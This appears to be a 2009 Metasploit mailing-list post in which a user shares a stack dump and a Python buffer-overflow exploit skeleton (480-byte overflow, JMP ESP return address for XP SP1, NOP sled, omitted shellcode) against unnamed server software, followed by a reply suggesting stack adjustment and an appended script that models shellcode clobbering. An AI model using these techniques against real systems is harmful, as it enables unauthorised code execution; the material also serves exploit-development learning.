Metasploit mailing list archives
No room for shellcode
From: egypt at metasploit.com (egypt at metasploit.com)
Date: Sat, 2 May 2009 14:28:12 -0600
It is possible that the shellcode is corrupting itself because ESP is too close to EIP. The first thing I would try is to prepend an instruction like "add esp, -3500" to the shellcode. In a regular Metasploit module this can be achieved by adding "'StackAdjustment' => -3500" in the Payload section of the info at the top.

Hope this helped,
egypt

On Sat, May 2, 2009 at 10:31 AM, DB Allen <allendb760 at googlemail.com> wrote:
It's not a specific metasploit question - but I did use metasploit to generate the shellcode :-). I'm trying to write an exploit for a popular server based software but don't have room for the shellcode anywhere. Here is a copy of the stack (doing this on XP SP1, so no DEP):

    00A4FD40  41414141  AAAA
    00A4FD44  41414141  AAAA
    00A4FD48  41414141  AAAA
    00A4FD4C  41414141  AAAA
    00A4FD50  41414141  AAAA
    00A4FD54  77D718FC  USER32.77D718FC  -> JMP ESP
    00A4FD58  90909090
    00A4FD5C  90909090  -> ESP
    00A4FD60  90909090
    00A4FD64  90909090
    00A4FD68  4DEB6AFC  -> Shellcode start (should be 317 bytes)
    00A4FD6C  FFFFF9E8
    00A4FD70  6C8B60FF
    00A4FD74  458B2424
    00A4FD78  057C8B3C
    00A4FD7C  8BEF0178
    00A4FD80  5F8B184F
    00A4FD84  49EB0120
    00A4FD88  018B348B
    00A4FD8C  99C031EE
    00A4FD90  74C084AC
    00A4FD94  20CAC107  -> Shellcode goes tits up.
    00A4FD98  746E6320  xxxx  -> Normal program code (obfuscated)
    00A4FD9C  6C492072  xxxx
    00A4FDA0  6167656C  xxxx
    00A4FDA4  7375206C  xxxx
    00A4FDA8  64697265  xxxx  Pointer to next SEH record
    00A4FDAC  6F4C202E  xxxx  SE handler
    00A4FDB0  206E6967  xxxx

The buffer is 480 bytes to cause the overflow. Here is the relevant bit of Python:

    # Python 2: str literals are byte strings here
    import socket

    # JMP ESP XP SP1 (USER32.77D718FC), little-endian
    jmp_sp1 = '\xfc\x18\xd7\x77'
    user = 'USER '
    buff = "A" * 480
    NOP = '\x90'
    # shellcode = the Metasploit-generated payload (317 bytes, not included in the mail)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.2.4', XXXX))
    s.recv(1024)
    while 1:
        s.send(user + buff + jmp_sp1 + NOP * 16 + shellcode + "\r\n")

I'm thinking that I can include the shellcode as part of the buffer and find a static JMP [ESP-xxx] in memory, that could send the execution flow back into the buffer and to the shellcode. Is this a normal method to choose? Also is it reliable across OSes of the same service pack? If there is a better way, I'd love to hear it.

Thanks,
DB

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
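The layout egypt's suggestion reasons about can be checked mechanically rather than eyeballed. The following is an added example and is not code from either mail or from Metasploit: it parses a debugger-style stack dump (the dword column below is copied from the dump quoted above, with the ASCII column and annotations dropped), locates the filler run, the overwritten return slot and the start of the payload after the NOP sled, and then models the half-open address range that stack growth (pushes and calls below ESP) will write to, with and without a stack adjustment such as "add esp, -3500". The ESP value is taken from the dump's "-> ESP" annotation; the number of bytes the payload is assumed to push (2048) and the second scenario with ESP sitting inside the payload are constructed for illustration. The model only covers writes below ESP, so it is a sanity check on the adjustment, not a full account of what a given payload touches.

```python
import re
from typing import NamedTuple

# Constructed input: the address and dword columns of the stack dump quoted
# in the thread, without the debugger's ASCII column or annotations.
STACK_DUMP = """
00A4FD40  41414141
00A4FD44  41414141
00A4FD48  41414141
00A4FD4C  41414141
00A4FD50  41414141
00A4FD54  77D718FC
00A4FD58  90909090
00A4FD5C  90909090
00A4FD60  90909090
00A4FD64  90909090
00A4FD68  4DEB6AFC
00A4FD6C  FFFFF9E8
"""

ESP_FROM_DUMP = 0x00A4FD5C   # the dword the dump marks with "-> ESP"
SHELLCODE_LEN = 317          # stated in the dump annotation
FILLER = 0x41414141          # the "A" * 480 padding
NOP_DWORD = 0x90909090

LINE_RE = re.compile(r"^\s*([0-9A-Fa-f]{8})\s+([0-9A-Fa-f]{8})\s*$")


def parse_dump(text: str) -> dict[int, int]:
    """Map stack address -> dword value; lines that are not 'addr value' are skipped."""
    stack = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            stack[int(m.group(1), 16)] = int(m.group(2), 16)
    return stack


class Layout(NamedTuple):
    ret_slot: int        # address of the dword right after the filler run
    ret_value: int       # the value the saved return address was overwritten with
    nop_start: int       # first dword after the return slot
    payload_start: int   # first non-NOP dword after the sled


def find_layout(stack: dict[int, int]) -> Layout:
    """Locate the overwritten return slot and the payload start in a parsed dump."""
    addrs = sorted(stack)
    filler_addrs = [a for a in addrs if stack[a] == FILLER]
    if not filler_addrs:
        raise ValueError("no filler run in dump")
    ret_slot = filler_addrs[-1] + 4
    ret_value = stack[ret_slot]
    nop_start = ret_slot + 4
    a = nop_start
    while stack.get(a) == NOP_DWORD:   # walk past the NOP sled
        a += 4
    return Layout(ret_slot, ret_value, nop_start, a)


def stack_growth(esp: int, pushed_bytes: int, adjustment: int = 0) -> tuple[int, int]:
    """Half-open range [lo, hi) written by pushed_bytes of stack use starting at esp + adjustment."""
    new_esp = esp + adjustment        # 'add esp, -3500' moves ESP down by 3500
    return new_esp - pushed_bytes, new_esp


def overlap(a: tuple[int, int], b: tuple[int, int]) -> int:
    """Number of bytes shared by two half-open ranges."""
    return max(0, min(a[1], b[1]) - max(a[0], b[0]))


def min_adjustment(esp: int, payload: tuple[int, int], pushed_bytes: int) -> int:
    """Smallest-magnitude adjustment <= 0 that keeps stack growth off the payload (0 if already clear)."""
    if overlap(stack_growth(esp, pushed_bytes), payload) == 0:
        return 0
    # Move ESP down to the bottom of the payload; everything pushed then lands below it.
    return payload[0] - esp


def report(stack: dict[int, int], esp: int, shellcode_len: int,
           pushed_bytes: int, adjustment: int = 0) -> dict:
    """Summarise the layout and the clobber check for one ESP / adjustment choice."""
    layout = find_layout(stack)
    payload = (layout.payload_start, layout.payload_start + shellcode_len)
    growth = stack_growth(esp, pushed_bytes, adjustment)
    return {
        "ret_slot": layout.ret_slot,
        "ret_value": layout.ret_value,
        "payload": payload,
        "stack_growth": growth,
        "clobbered_bytes": overlap(growth, payload),
        "min_adjustment": min_adjustment(esp, payload, pushed_bytes),
    }


if __name__ == "__main__":
    stack = parse_dump(STACK_DUMP)
    # 2048 pushed bytes is a constructed figure, not something the mail states.
    for adj in (0, -3500):
        r = report(stack, ESP_FROM_DUMP, SHELLCODE_LEN, 2048, adj)
        print(f"adjustment {adj:6d}: growth {r['stack_growth'][0]:08X}-{r['stack_growth'][1]:08X}, "
              f"payload {r['payload'][0]:08X}-{r['payload'][1]:08X}, clobbered {r['clobbered_bytes']}")
```

Run as a script it prints the stack-growth range against the payload range for adjustments of 0 and -3500; `min_adjustment` gives the smallest move that clears the payload when ESP lands inside it, which is the situation egypt's "add esp, -3500" is a generous fixed answer to.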
Current thread:
- No room for shellcode DB Allen (May 02)
- No room for shellcode egypt at metasploit.com (May 02)
- No room for shellcode Patrick Webster (May 03)
- No room for shellcode DB Allen (May 03)
- No room for shellcode H D Moore (May 03)
- No room for shellcode DB Allen (May 03)
- No room for shellcode H D Moore (May 03)
- No room for shellcode DB Allen (May 04)
- No room for shellcode Patrick Webster (May 05)
- No room for shellcode Patrick Webster (May 03)
- No room for shellcode egypt at metasploit.com (May 02)
- No room for shellcode Kim Guldberg (May 03)